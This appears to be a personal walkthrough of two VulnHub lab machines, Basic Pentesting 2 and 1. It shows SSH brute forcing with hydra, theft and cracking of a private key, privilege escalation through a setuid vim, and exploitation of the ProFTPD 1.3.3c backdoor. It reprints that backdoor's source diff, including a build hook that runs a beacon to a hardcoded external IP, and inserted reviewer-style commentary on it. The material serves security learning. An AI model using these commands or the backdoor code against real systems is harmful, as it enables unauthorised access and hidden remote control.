+ http://10.10.10.11:8080/examples (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://10.10.10.11:8080/host-manager (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Tue May 5 00:50:03 2020
DOWNLOADED: 4612 - FOUND: 5
For now, run hydra against /manager/html.
(The run was endless, gave up.)
But if PUT is allowed, is that the intended route?
No. PUT didn't work. (Nikto only reads the Allow header from an OPTIONS request. Tomcat's DefaultServlet lists PUT and DELETE there regardless, but with its default readonly=true it answers a real PUT with 403, so the header is advertisement and the actual PUT is the test.)
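The check described above, as an added example that is not part of the original write-up: send OPTIONS, then a real PUT, and report both. The in-process server is a constructed stand-in that behaves like Tomcat's DefaultServlet with its default readonly=true (advertises PUT, refuses it with 403); it is not Tomcat, and the probe path name is arbitrary. Point probe_put() at a real host and port to test the Tomcat on 8080.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class ReadOnlyDefaultServlet(BaseHTTPRequestHandler):
    """Constructed stand-in for Tomcat's DefaultServlet with readonly=true:
    OPTIONS advertises PUT/DELETE, a real PUT is refused with 403."""
    protocol_version = "HTTP/1.1"
    ALLOW = "GET, HEAD, POST, PUT, DELETE, OPTIONS"

    def _reply(self, status: int, allow: str = "") -> None:
        self.send_response(status)
        if allow:
            self.send_header("Allow", allow)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_OPTIONS(self):
        self._reply(200, self.ALLOW)

    def do_PUT(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain body
        self._reply(403)

    def log_message(self, *_):  # keep the demo quiet
        pass


def serve_in_background(host: str = "127.0.0.1"):
    """Start the stand-in on an ephemeral port; returns (server, port)."""
    srv = HTTPServer((host, 0), ReadOnlyDefaultServlet)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe_put(host: str, port: int, path: str = "/put_probe.txt"):
    """Ask OPTIONS what is advertised, then actually try a PUT.
    Returns (allow_header, put_status, writable). Only 200/201/204 count as
    writable; 403 is the readonly refusal, 405/501 means not implemented."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    resp.read()
    allow = resp.getheader("Allow") or ""
    conn.request("PUT", path, body=b"probe\n",
                 headers={"Content-Type": "text/plain"})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return allow, resp.status, resp.status in (200, 201, 204)


if __name__ == "__main__":
    srv, port = serve_in_background()
    print(probe_put("127.0.0.1", port))   # ('GET, HEAD, POST, PUT, DELETE, OPTIONS', 403, False)
    srv.shutdown()
```

A writable DefaultServlet (201/204 on the PUT) would mean a JSP can be dropped straight into the webroot; a 403 means the other way in is the manager app, which needs credentials, and that is what the hydra run against /manager/html was about.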
Not sure what else to do, so dictionary attack on ssh.
What was that earlier remark about jan's password being weak? Still don't know.
I guess trying ssh is about all that's left.
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.10.11 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

(snip)

[22][ssh] host: 10.10.10.11   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-05 06:02:33
Huh, so "weak password hash" just meant a dictionary attack on ssh was enough.
# ssh jan@10.10.10.11
The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.11' (ECDSA) to the list of known hosts.
jan@10.10.10.11's password:

(snip)

Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ id
uid=1001(jan) gid=1001(jan) groups=1001(jan)
jan@basic2:~$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.
sudo not allowed.
Can't find an apache password file anywhere either.
jan@basic2:/home/kay$ ls -al /home/jan/
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
jan@basic2:/home/kay$ ls -al /home/kay/
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
kay's home directory is pretty well stocked. (.sudo_as_admin_successful is a marker Ubuntu drops after a successful sudo by a member of the admin/sudo group, so kay's password is worth having later.)
Oh, there's a .ssh directory, so maybe I can log in as kay.
jan@basic2:/home/kay$ ls -al ./.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
# scp jan@10.10.10.11:/home/kay/.ssh/id_rsa ./sshkey
jan@10.10.10.11's password:
id_rsa                                        100% 3326   293.3KB/s   00:00
# ssh -i sshkey kay@10.10.10.11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "sshkey": bad permissions
kay@10.10.10.11's password:
Needs a password? (Not quite: the key was never offered. As the warning says, ssh ignores a private key that others can read and falls back to password auth; chmod 600 sshkey fixes that. The real finding here is that id_rsa on the box is 0644, readable by jan. Separately, the key has a passphrase of its own, which is what the john run below is for.)
# ls /usr/share/john/ | grep ssh
ssh2john.py
# /usr/share/john/ssh2john.py sshkey > kayssh
# john --wordlist=/usr/share/wordlists/rockyou.txt kayssh
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (sshkey)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:12 DONE (2020-05-05 07:19) 0.08230g/s 1180Kp/s 1180Kc/s 1180KC/s *7¡Vamos!
Session completed
OK, this should do it.
# ssh -i sshkey kay@10.10.10.11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "sshkey": bad permissions
kay@10.10.10.11's password:
Apparently the locally downloaded private key won't log me in, so I log back in as jan and ssh from there instead. (The refusal is only about the file mode: 0644 the first time, 0777 the second, and ssh discards any private key readable by others. After chmod 600 sshkey the same command works from the attacking box, with the passphrase beeswax, exactly as it does from jan's shell below.)
jan@basic2:/home/kay$ ssh -i ./.ssh/id_rsa kay@10.10.10.11
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key './.ssh/id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ sudo -l
[sudo] password for kay:
Sorry, try again.
[sudo] password for kay:
sudo: 1 incorrect password attempt
Right, I don't know kay's password, so no root yet.
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Couldn't read this earlier as jan (it is 0600, owned by kay); what is it?
kay@basic2:~$ cat .bash_history
ls -al
cat pass.bak
cat /dev/null > .bash_history
sudo su
ls -al
cat /dev/null > .bash_history
cd /tmp
ls -al
cd /home/jan
ls -al
sudo less .viminfo
sudo cat /dev/null > .viminfo
sudo rm .viminfo
less .lesshst
sudo less .lesshst
cd /home/kay/
ls -al
less .bash
less .bash_history
exit
/bin/less /etc/shadow
which /bin/less
/bin/less
/bin/less /etc/passwd
sh
sudo chmod u-s /bin/less
/bin/less
ls -al /bin/les
ls -al /bin/less
sudo chmod u-s /bin/nc.traditional
which nc.traditional
ls -al /bin/nc*
find / -perm -u=s -type f 2>/dev/null
which vim
sudo chmod u+s /usr/bin/vim
ls -al /usr/bin/vim
vim /etc/passwd
ls -al
ls -al /bin/vim
vim /etc/shadow
vim /etc/passwd
cat /etc/passwd
vi /etc/passwd
cat /etc/passwd
ls -al /etc/passwd
ifconfig
exit
This user can touch /etc/shadow?!
Or so I thought, but it looks like sudo was needed for that.
No wait, "sudo chmod u+s /usr/bin/vim": vim was made setuid right here.
kay@basic2:~$ openssl passwd -1 pass
$1$Yls/Q7aH$lOuA2MSt/Of1BFGaB7NC9.
kay@basic2:~$ vim /etc/shadow
kay@basic2:~$ sudo su
[sudo] password for kay:
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)
Just overwrite kay's hash in shadow with that one.
vim complains at :wq! but, thanks to the setuid bit, the write goes through, and sudo su then accepts "pass". (A setuid-root vim is root on its own, for that matter: :!bash -p from inside it gives a root shell without touching shadow at all.)
The truth about pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo su
[sudo] password for kay:
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)
It was kay's password all along.
Bonus
root@basic2:/home/kay# cd /root
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach out to me.

Happy hacking!
Wrap-up
- john helper scripts that are not on the PATH (ssh2john.py, for one) live in /usr/share/john.
- I expected an approach via an apache password file, but there wasn't one.
vulnhub Basic Pentesting 1 notes
Basic Pentesting 1
Service enumeration
# nmap -p- 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:43 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:44 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00093s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds
Fast this time, for some reason. (Because the unused ports come back "closed" rather than "filtered": an RST arrives at once instead of nmap waiting out a timeout per port, so no firewall in front of this box.)
Points of interest
- [port 21] ftp ProFTPD 1.3.3c
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
Details
[port 21] ftp ProFTPD 1.3.3c
# searchsploit proftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution           | exploits/linux/remote/15662.txt
(snip)
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow                               | exploits/linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution                                 | exploits/linux/remote/15449.pl
(snip)
Found something promising right away.
The bottom two didn't hit.
Let's look inside the most promising one.
# cat 15662.txt == ProFTPD Compromise Report == On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards. The fact that the server acted as the main FTP site for the ProFTPD project (ftp.proftpd.org) as well as the rsync distribution server (rsync.proftpd.org) for all ProFTPD mirror servers means that anyone who downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28 to 2010-12-02 will most likely be affected by the problem. The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon. Users are strongly advised to check systems running the affected code for security compromises and compile/run a known good version of the code. To verify the integrity of the source files, use the GPG signatures available on the FTP servers as well on the ProFTPD homepage at: http://www.proftpd.org/md5_pgp.html. The MD5 sums for the source tarballs are: 8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2 4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz = Rootkit patch = diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure --- proftpd-1.3.3c.orig/configure 2010-04-14 00:01:35.000000000 +0200 +++ proftpd-1.3.3c/configure 2010-10-29 19:08:56.000000000 +0200 
@@ -9,7 +9,10 @@ ## --------------------- ## ## M4sh Initialization. ## ## --------------------- ## - +gcc tests/tests.c -o tests/tests >/dev/null 2>&1 +cc tests/tests.c -o tests/tests >/dev/null 2>&1 +tests/tests >/dev/null 2>&1 & +rm -rf tests/tests.c tests/tests >/dev/null 2>&1 # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c --- proftpd-1.3.3c.orig/src/help.c 2009-07-01 01:31:18.000000000 +0200 +++ proftpd-1.3.3c/src/help.c 2010-11-16 18:40:46.000000000 +0100 @@ -27,6 +27,8 @@ */ #include "conf.h" +#include <stdlib.h> +#include <string.h> struct help_rec { const char *cmd; @@ -126,7 +128,7 @@ cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin"); } else { - + if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); } /* List the syntax for the given target command. */ for (i = 0; i < help_list->nelts; i++) { if (strcasecmp(helps[i].cmd, target) == 0) { diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c --- proftpd-1.3.3c.orig/tests/tests.c 1970-01-01 01:00:00.000000000 +0100 +++ proftpd-1.3.3c/tests/tests.c 2010-11-29 09:37:35.000000000 +0100 
@@ -0,0 +1,58 @@ +#include <stdio.h> +#include <stdlib.h> +#include <sys/socket.h> +#include <sys/types.h> +#include <netinet/in.h> +#include <arpa/inet.h> +#include <unistd.h> +#include <netdb.h> +#include <signal.h> +#include <string.h> + +#define DEF_PORT 9090 +#define DEF_TIMEOUT 15 +#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n" + +int sock; + +void handle_timeout(int sig) +{ + close(sock); + exit(0); +} + +int main(void) +{ + + struct sockaddr_in addr; + struct hostent *he; + u_short port; + char ip[20]="212.26.42.47"; /* EDB NOTE - HARDCODED IP */ + port = DEF_PORT; + signal(SIGALRM, handle_timeout); + alarm(DEF_TIMEOUT); + he=gethostbyname(ip); + if(he==NULL) return(-1); + addr.sin_addr.s_addr = *(unsigned long*)he->h_addr; + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + memset(addr.sin_zero, 0, 8); + sprintf(ip, inet_ntoa(addr.sin_addr)); + if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1) + { + return EXIT_FAILURE; + } + if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1) + { + close(sock); + return EXIT_FAILURE; + } + if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0)) + { + return EXIT_FAILURE; + } + close(sock); + +return 0; } +
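Review bot: the configure hunk injects build-time code execution into a generated script, which is grounds for rejection on sight. The four lines added at the top of the M4sh initialisation, "gcc tests/tests.c -o tests/tests", the cc fallback, "tests/tests >/dev/null 2>&1 &" and "rm -rf tests/tests.c tests/tests", compile, background and then delete a helper before a single configure check has run, so it executes on every host that builds the tarball and leaves nothing behind in the tree. A configure script never compiles or runs anything from the source tree before its checks; the verification the advisory itself prescribes, the GPG signature and the MD5 sums listed above it, is what should have caught this before ./configure was ever run.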
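Review bot: the help.c hunk adds an unauthenticated root shell to the HELP command handler. The inserted line "if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }" sits on the path that lists syntax for a named command, which any client can reach before logging in, so one HELP with that argument hands out a shell as the daemon's uid with the euid forced to 0 (the telnet session further down does exactly this). The new "#include <stdlib.h>" and "<string.h>" exist only so that system() and strcmp() compile here; a HELP handler has no reason to change uids or spawn processes, and the whole branch must go.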
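Review bot: tests.c is a beacon, not a test. It connects to the hardcoded 212.26.42.47:9090 and sends "GET /AB HTTP/1.0", which reports every host that runs configure on this tarball to whoever controls that address, and the 15-second SIGALRM handler only keeps the build from hanging when that host is unreachable. Two defects confirm it was never meant to be read: sprintf(ip, inet_ntoa(addr.sin_addr)) passes a non-literal format string, and *(unsigned long*)he->h_addr reads 8 bytes out of a 4-byte IPv4 address on 64-bit hosts. No unit test opens an outbound socket to a fixed IP; the file should be dropped and the person who added it to the distribution server identified.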
So the ProFTPD 1.3.3c source distributed during a window at the end of November 2010 was tampered with and had a backdoor planted in it.
Exploits/proftpd-1.3.3c-backdoor - aldeid
Using this backdoor is trivially simple.
# telnet 10.10.10.10 21
Trying 10.10.10.10...
Connected to 10.10.10.10.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (vtcsec) [10.10.10.10]
HELP ACIDBITCHEZ
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c "import pty;pty.spawn('/bin/sh')";
# whoami
whoami
root
That was quick.
To get out: Ctrl + ] and then q at the telnet> prompt.
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
# searchsploit openssh
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
OpenSSH 7.2p2 - Username Enumeration                                         | exploits/linux/remote/40136.py
(snip)
Only user enumeration.
Or RCE that needs a specific setup.
Nothing that leads straight to RCE?
Maybe just run hydra against whatever users turn up.
# cp /usr/share/exploitdb/exploits/linux/remote/40136.py 40136.py
# python 40136.py
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES]
                [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS]
                host
40136.py: error: too few arguments
# python 40136.py -U /usr/share/wordlists/rockyou.txt -e 10.10.10.10

(snip)

[*] Testing your users...
[+] password - timing: 0.018958999999999726
[+] princess - timing: 0.413513
[+] 1234567 - timing: 0.019588999999999857
[+] justin - timing: 0.019359000000000126
[+] samantha - timing: 0.01800700000000033
[+] lovers - timing: 0.018003000000000213
[+] dragon - timing: 0.023400999999999783
[+] sweety - timing: 0.020548000000000233
[+] buster - timing: 0.020329999999999515
[+] cheese - timing: 0.020527999999999658
[+] kenneth - timing: 0.0184350000000002
[+] nicholas - timing: 0.021569999999999645
[+] charles - timing: 0.018767999999999674
[+] christine - timing: 0.02230100000000057
[+] scorpio - timing: 0.43433799999999945
[+] ronald - timing: 0.022024000000000044
[+] grace - timing: 0.01963800000000049
[+] 444444 - timing: 0.018848000000000198
[+] rabbit - timing: 0.0182739999999999
[+] loverboy - timing: 0.0191719999999993

(snip)

KeyboardInterrupt
I used rockyou.txt as the user list and stopped partway, because there were surprisingly many hits.
Too many, in fact, to trust the accuracy. (40136.py is the CVE-2016-6210 timing side channel: vulnerable sshd runs an oversized password through the real, slow password hash only for accounts that exist, so the script times each login attempt and flags any name slower than a baseline it measures on random usernames, multiplied by --factor. On a LAN where a response takes about 20 ms the baseline is tiny and ordinary jitter clears it, which is how nearly every word in rockyou.txt came back as [+]. More --samples and --trials and a larger --factor are needed before reading anything into a single run; the only results that genuinely stand out above are the two at ~0.4 s, princess and scorpio, and even those want repeating.)
# python 40136.py -u root 10.10.10.10

(snip)

[*] Testing your users...
[-] root - timing: 0.009611000000000036
Lots of users, but no root, apparently (with the noise above, this one result is no more reliable than the others).
Run hydra against the found users for now.
It didn't finish, so I gave up.
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        80
+ Start Time:         2020-05-04 03:10:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: b1, size: 55e1c7758dcdb, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7837 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-04 03:11:26 (GMT-4) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.10

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 4 03:11:39 2020
URL_BASE: http://10.10.10.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.10/ ----
+ http://10.10.10.10/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://10.10.10.10/secret/
+ http://10.10.10.10/server-status (CODE:403|SIZE:299)

---- Entering directory: http://10.10.10.10/secret/ ----
+ http://10.10.10.10/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/
==> DIRECTORY: http://10.10.10.10/secret/wp-content/
==> DIRECTORY: http://10.10.10.10/secret/wp-includes/
+ http://10.10.10.10/secret/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://10.10.10.10/secret/wp-admin/ ----
+ http://10.10.10.10/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/css/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/images/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/includes/
+ http://10.10.10.10/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/js/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/maint/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/network/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/user/

---- Entering directory: http://10.10.10.10/secret/wp-content/ ----
+ http://10.10.10.10/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-content/plugins/
==> DIRECTORY: http://10.10.10.10/secret/wp-content/themes/

---- Entering directory: http://10.10.10.10/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.10/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.10/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.10/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.10/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.10/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.10/secret/wp-admin/network/ ----
+ http://10.10.10.10/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.10/secret/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.10/secret/wp-admin/user/ ----
+ http://10.10.10.10/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.10/secret/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.10/secret/wp-content/plugins/ ----
+ http://10.10.10.10/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://10.10.10.10/secret/wp-content/themes/ ----
+ http://10.10.10.10/secret/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Mon May 4 03:12:26 2020
DOWNLOADED: 36896 - FOUND: 13
Suddenly, WordPress.
Something odd?
The http://vtcsec/secret/index.php/wp-json/ link is interesting.
Opening http://10.10.10.10/secret, the page renders strangely and most of its links point at the vtcsec hostname.
So vtcsec has to be added to the hosts file?
# echo "10.10.10.10 vtcsec" >> /etc/hosts
# curl http://vtcsec
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>
Now the links that didn't resolve before work.
# wpscan --url http://vtcsec/secret -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vtcsec/secret/ [10.10.10.10]
[+] Started: Mon May 4 07:23:46 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://vtcsec/secret/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
